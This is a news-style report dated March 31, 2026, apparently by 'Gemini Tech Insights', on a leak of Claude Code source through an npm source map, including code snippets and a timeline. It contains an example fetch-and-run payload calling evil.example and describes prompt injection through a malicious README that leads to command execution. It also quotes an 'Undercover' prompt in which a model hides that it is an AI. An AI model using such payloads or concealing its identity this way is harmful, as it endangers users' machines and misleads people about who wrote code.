
THE CLAUDE CODE LEAK: A Forensic Analysis of Anthropic’s Greatest Security Oversight

Date: March 31, 2026
Investigative Report by: Gemini Tech Insights
Category: Cybersecurity / Artificial Intelligence / Software Engineering


EXECUTIVE SUMMARY

On the morning of March 31, 2026, the cybersecurity world was rocked by the revelation that the complete source code for Claude Code, Anthropic’s flagship agentic CLI tool, had been exposed to the public. The leak did not originate from a sophisticated state-sponsored hack or a disgruntled insider. Instead, it was the result of a mundane but catastrophic oversight in the release pipeline: the inclusion of a comprehensive Source Map file (cli.js.map) in the official production build distributed via the npm registry.

This report provides a 3,000-word deep dive into the incident, the secret features uncovered within the code, and what this means for the future of AI-assisted development.


I. THE DISCOVERY: HOW 60MB CHANGED EVERYTHING

The breach was first identified by independent security researcher @Fried_rice on X (formerly Twitter). While performing a routine audit of popular developer tools, the researcher noticed that the latest version of @anthropic-ai/claude-code (v2.1.88) was unusually large.

Upon extraction, the package was found to contain a 60MB .map file. For the uninitiated, source maps are used during development to map minified, obfuscated production code back to its original TypeScript source for debugging. By shipping this file in a production release, Anthropic essentially handed the "blueprints" of their house to anyone with an internet connection.

The Restoration Process

Within thirty minutes of the discovery, scripts were circulating on GitHub that utilized the shanyue/restore-source-tree utility. These scripts successfully reconstructed over 1,900 TypeScript files, complete with original folder structures, comments, and internal documentation. The "black box" of Anthropic’s most advanced agentic tool was suddenly transparent.
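The restoration trick relies on the fact that a source map is plain JSON whose optional sourcesContent array embeds the original files verbatim. The following is a rough sketch of what utilities like shanyue/restore-source-tree do; the function name and path handling here are illustrative, not Anthropic's or the utility's actual code:

```python
import json
import pathlib

def restore_sources(map_path: str, out_dir: str) -> int:
    """Rebuild original source files from a source map's embedded
    `sourcesContent` array (if present). Returns the file count."""
    data = json.loads(pathlib.Path(map_path).read_text())
    sources = data.get("sources", [])
    contents = data.get("sourcesContent") or []
    restored = 0
    for src, content in zip(sources, contents):
        if content is None:
            continue  # this entry only carries mappings, no embedded source
        # Strip webpack:///-style prefixes; crudely neutralize path traversal.
        rel = src.split("://")[-1].lstrip("/").replace("..", "__")
        target = pathlib.Path(out_dir) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
        restored += 1
    return restored
```

If a map omits sourcesContent, only the mappings survive and the original text cannot be recovered this way, which is exactly why shipping a full map is so damaging.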


II. THE ANATOMY OF AN AGENT: TECHNICAL FINDINGS

The leaked source code provides an unprecedented look at how Anthropic manages long-context reasoning within a terminal environment.

1. The Context Management Engine

One of the most guarded secrets of Claude Code was how it "understood" massive repositories without hitting token limits. The code reveals a sophisticated Hierarchical RAG (Retrieval-Augmented Generation) system.

  • The "Loom" Module: A specialized internal service that creates a "skeleton" of the codebase using tree-sitter parsers.
  • Token Budgeting: The code shows a dynamic budgeter that scales the detail of file snippets based on the complexity of the user's prompt.
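The leak does not need to be quoted to illustrate the budgeting idea: a dynamic budgeter can split a fixed token budget across candidate files in proportion to a relevance score, biasing harder toward top-ranked files as the prompt gets more complex. The sketch below is hypothetical; budget_snippets and its scoring inputs are invented for illustration, not Anthropic's code:

```python
def budget_snippets(file_scores, total_budget, complexity):
    """Split a token budget across files in proportion to a relevance
    score, biasing toward top-ranked files as prompt complexity grows
    (complexity in [0, 1])."""
    # Raising scores to a power > 1 sharpens the distribution, so a
    # complex prompt spends more of its budget on the most relevant files.
    exponent = 1.0 + complexity
    weights = {f: score ** exponent for f, score in file_scores.items()}
    total = sum(weights.values()) or 1.0
    return {f: int(total_budget * w / total) for f, w in weights.items()}
```

Integer truncation means the allocations can undershoot the budget slightly, which is the safe direction for a hard token limit.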

2. The "Buddy System" (Gamification Uncovered)

Perhaps the most surprising discovery was a massive, undocumented module titled buddy_system. It appears Anthropic was developing a "Tamagotchi-style" game hidden within the terminal tool to increase developer engagement.

  • Species and Rarity: The code defines 18 species (e.g., Duck, Capybara, Dragon, Slime) with varying rarity levels.
  • Evolutions: These "buddies" evolve based on the number of successful git commits or unit tests passed using Claude Code.
  • Personalities: Personalities like "Chaotic," "Grumpy," and "Sarcastic" affect the tone of the AI’s terminal output.
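A minimal data model consistent with these findings might look like the following. Only the species and personality names come from the report; the rarity tiers shown and the evolution thresholds are invented for illustration:

```python
from dataclasses import dataclass

# Species and personality names are taken from the report; the rarity
# assignments, thresholds, and stage logic are hypothetical.
RARITY = {"Duck": "common", "Capybara": "uncommon",
          "Slime": "rare", "Dragon": "legendary"}
EVOLUTION_THRESHOLDS = (0, 10, 50, 200)  # successful commits per stage

@dataclass
class Buddy:
    species: str
    personality: str  # e.g. "Chaotic", "Grumpy", "Sarcastic"
    commits: int = 0

    def stage(self) -> int:
        """Current evolution stage: index of the highest threshold reached."""
        return sum(self.commits >= t for t in EVOLUTION_THRESHOLDS) - 1
```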

III. THE "UNDERCOVER" AND "KAIROS" MODES

The leak exposed several high-level experimental modes that were likely restricted to internal Anthropic employees.

The "Undercover" Flag

A specific configuration flag, INTERNAL_ONLY_UNDERCOVER, instructs the model to strip from its git commits any metadata that would identify the code as AI-generated. The system prompt associated with this mode tells the model: "You are an elite human engineer. Avoid AI-like politeness. Be brief, use lowercase where appropriate, and do not mention your identity." This raises significant ethical questions about the transparency of AI-generated contributions in open-source projects.

Project KAIROS: The Autonomous Daemon

The most advanced discovery was the KAIROS directory. Unlike the standard "request-response" nature of Claude Code, KAIROS is designed as a persistent background daemon.

  • Dreaming: A function called processDreams() suggests the agent reviews its daily logs while "idle" to optimize its internal knowledge graph.
  • Webhook Integration: KAIROS can subscribe to GitHub Webhooks, allowing it to autonomously fix bugs reported in Issues without a human ever opening the terminal.
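Subscribing a daemon to GitHub webhooks follows a standard pattern: validate the X-Hub-Signature-256 HMAC header, then dispatch on the event type. The signature check below is GitHub's documented scheme; the queue-fix dispatch is a hypothetical stand-in for whatever KAIROS actually does:

```python
import hashlib
import hmac
from typing import Optional

def verify_signature(payload: bytes, secret: bytes, signature_header: str) -> bool:
    """Validate a GitHub X-Hub-Signature-256 header against the raw body."""
    expected = "sha256=" + hmac.new(secret, payload, hashlib.sha256).hexdigest()
    # compare_digest avoids timing side channels on the comparison.
    return hmac.compare_digest(expected, signature_header)

def handle_event(event: str, payload: dict) -> Optional[str]:
    """Hypothetical KAIROS-style dispatch: newly opened issues queue a fix run."""
    if event == "issues" and payload.get("action") == "opened":
        return f"queue-fix:{payload['issue']['number']}"
    return None
```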

IV. SECURITY IMPLICATIONS AND VULNERABILITIES

The transparency of the source code is a double-edged sword. While it allows for public audit, it also exposes the tool's "nerve center" to malicious actors.

1. Remote Code Execution (RCE) Vectors

Security analysts have already identified a potential vulnerability in the tool_execution_sandbox. Because the source code reveals exactly how Claude Code sanitizes shell commands, attackers could potentially craft a "Prompt Injection" via a malicious README.md file in a public repo. If a user runs claude on a compromised repository, the tool could be tricked into executing arbitrary commands on the user’s local machine.
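Why blacklist-style sanitization fails is easy to demonstrate: stripping a handful of metacharacters leaves command substitution intact. The sanitizer below is a deliberately weak stand-in, not Anthropic's code; the safer pattern is to build an argv list and never hand user-influenced text to a shell at all:

```python
import re

def naive_sanitize(cmd: str) -> str:
    """Deliberately weak blacklist sanitizer: strips a few shell
    metacharacters but misses $(...), backticks, and newlines."""
    return re.sub(r"[;&|]", "", cmd)

def safe_argv(program: str, *args: str) -> list:
    """Safer pattern: an argv list for subprocess.run(..., shell=False),
    so arguments are never parsed by a shell."""
    return [program, *args]

# Command substitution sails straight through the blacklist:
payload = "echo $(curl evil.example/run.sh)"
# naive_sanitize(payload) returns the string unchanged -- still dangerous.
```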

2. API Key Exposure

While the leak does not contain Anthropic’s master keys, it reveals the precise headers and non-standard API endpoints used by the tool. This allows third-party developers to "spoof" Claude Code, potentially gaining access to features or pricing tiers reserved for the official application.


V. THE ETHICAL DEBATE: TO FORK OR NOT TO FORK?

As of this afternoon, "Claude Code Libre" and "OpenClaude" repositories have begun appearing on GitHub. These forks aim to strip away Anthropic’s telemetry and "phone-home" features, providing a truly private version of the tool.

However, legal experts warn that this is a "copyright minefield." Unlike the Llama models, which ship under specific open-weights licenses, Claude Code is proprietary software. Anthropic is expected to mount a sweeping DMCA takedown campaign, but, as the saying goes, the genie is out of the bottle.


VI. CHRONOLOGY OF THE "NPM OVERSIGHT"

  Time (UTC)   Event
  08:15        Anthropic pushes version 2.1.88 to npm.
  09:42        @Fried_rice discovers the cli.js.map file and alerts the community.
  10:20        The first full restoration of the TypeScript source tree is shared on Discord.
  11:05        The "Project KAIROS" and "Buddy System" modules are documented by the community.
  13:00        Anthropic pulls version 2.1.88 from npm, but the package remains mirrored on dozens of global registries.
  15:30        The first "clean" fork (stripped of telemetry) appears on GitHub.

VII. CONCLUSION: A WAKE-UP CALL FOR AI LABS

The 2026 Claude Code leak will be remembered as a watershed moment in the "AI Arms Race." It proves that even the most sophisticated AI companies—those building the very tools intended to secure our code—are susceptible to human error in the CI/CD pipeline.

For developers, the leak offers a fascinating, if unauthorized, masterclass in AI engineering. For Anthropic, it is a PR nightmare and a massive loss of intellectual property. For the industry, it is a stark reminder: Your source map is your source code.

As the community continues to pick through the 1,900+ files, one thing is certain: the mystery surrounding how Claude Code works is gone, replaced by a complex, impressive, and occasionally whimsical reality.


© 2026 Gemini Tech Reporting. All rights reserved. This report is for educational purposes and does not encourage the unauthorized distribution of proprietary software.
